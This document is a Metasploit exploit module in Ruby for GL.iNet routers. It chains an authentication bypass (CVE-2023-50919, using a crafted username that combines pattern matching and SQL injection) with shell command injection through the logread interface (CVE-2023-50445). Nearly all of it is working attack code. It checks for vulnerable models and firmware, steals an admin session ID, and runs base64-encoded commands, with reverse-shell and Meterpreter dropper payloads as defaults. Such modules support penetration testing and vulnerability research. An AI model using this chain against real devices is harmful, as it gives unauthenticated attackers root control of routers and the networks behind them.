GL.iNet Unauthenticated Remote Command Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',        'Description' => %q{          A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker          to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`          interface in the `logread` module.          This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen          by the attacker.          However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication          through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be          retrieved without knowing a valid username and password.          The following GL.iNet network products are vulnerable:          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;          - MT6000: v4.5.0 - v4.5.3;          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;          - E750/E750V2, MV1000: v4.3.8;          - X3000: v4.0.0 - v4.4.2;          - XE3000: v4.0.0 - v4.4.3;          - SFT1200: v4.3.6;          - and potentially others (just try ;-)          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads          when using the Linux Dropper target.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Unknown', # Discovery of the vulnerability CVE-2023-50445          'DZONERZY' # Discovery of the vulnerability CVE-2023-50919        ],        'References' => [          ['CVE', '2023-50445'],          ['CVE', '2023-50919'],          ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']        ],        'DisclosureDate' => '2023-12-10',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],              'Linemax' => 900,              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('SID', [false, 'Session ID'])    ])  end  def vuln_version?    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }    # check first with version 4.x api call    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        '',        'ui',        'check_initialized',        {}      ]    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('result')      res_json = res.get_json_document      unless res_json.blank?        @glinet['model'] = res_json['result']['model']        @glinet['firmware'] = res_json['result']['firmware_version']      end    else      # check with version 3.x api call. These versions are NOT vulnerable      res = send_request_cgi({        'method' => 'GET',        'ctype' => 'application/x-www-form-urlencoded',        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')      })      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')        res_json = res.get_json_document        unless res_json.blank?          @glinet['model'] = res_json['model']          @glinet['firmware'] = res_json['version']        end      end    end    # check for the vulnerable models and firmware versions    case @glinet['model']    when 'sft1200'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'mt300n-v2', 'mt1300'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'ap1300', 'b1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'e750', 'e750v2'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'mv1000'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'ax1800', 'axt1800', 'a1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt2500', 'mt2500a', 'mt3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt6000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')    when 'x3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')    when 'xe3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')    end    @glinet['arch'] = 'n/a'    return false  end  def auth_bypass    # Check if datastore['SID'] is set    return datastore['SID'] unless datastore['SID'].blank?    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.    # Send an RPC request calling the challenge method, which will return a random nonce,    # the selected root user’s salt, and the crypt’s algorithm to hash the password.    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'challenge',      params: {        username: 'root'      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('nonce')      res_json = res.get_json_document      unless res_json.blank?        nonce = res_json['result']['nonce']      end    else      fail_with(Failure::NotFound, 'Getting the random nonce failed.')    end    # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username    # Use the SQL injection part to lookup the ACLs for root stored in sqlite db    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"    pw = '0'    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")    # Login with the password hash and obtain the SessionID (SID)    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'login',      params: {        username: username.to_s,        hash: hash.to_s      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('sid')      res_json = res.get_json_document      unless res_json.blank?        sid = res_json['result']['sid']      end    else      fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')    end    return sid  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        @sid.to_s,        'logread',        'get_system_log',        {          lines: '',          module: "|#{cmd}"        }      ]    }.to_json    return send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'cookie' => "Admin-Token=#{@sid}",      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    # Check if target is a GL.iNet network device and the firmware version is vulnerable    return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?    unless @glinet['firmware'].nil?      # GL.iNet network devices with firmware version 3.x that are safe from this exploit      return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')      # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)      if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))        return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")      end      return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')    end    # No GL.iNet network device or not reachable    CheckCode::Unknown('No GL.iNet network device or device is not responding.')  end  def exploit    @sid = auth_bypass    print_status("SID: #{@sid}")    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend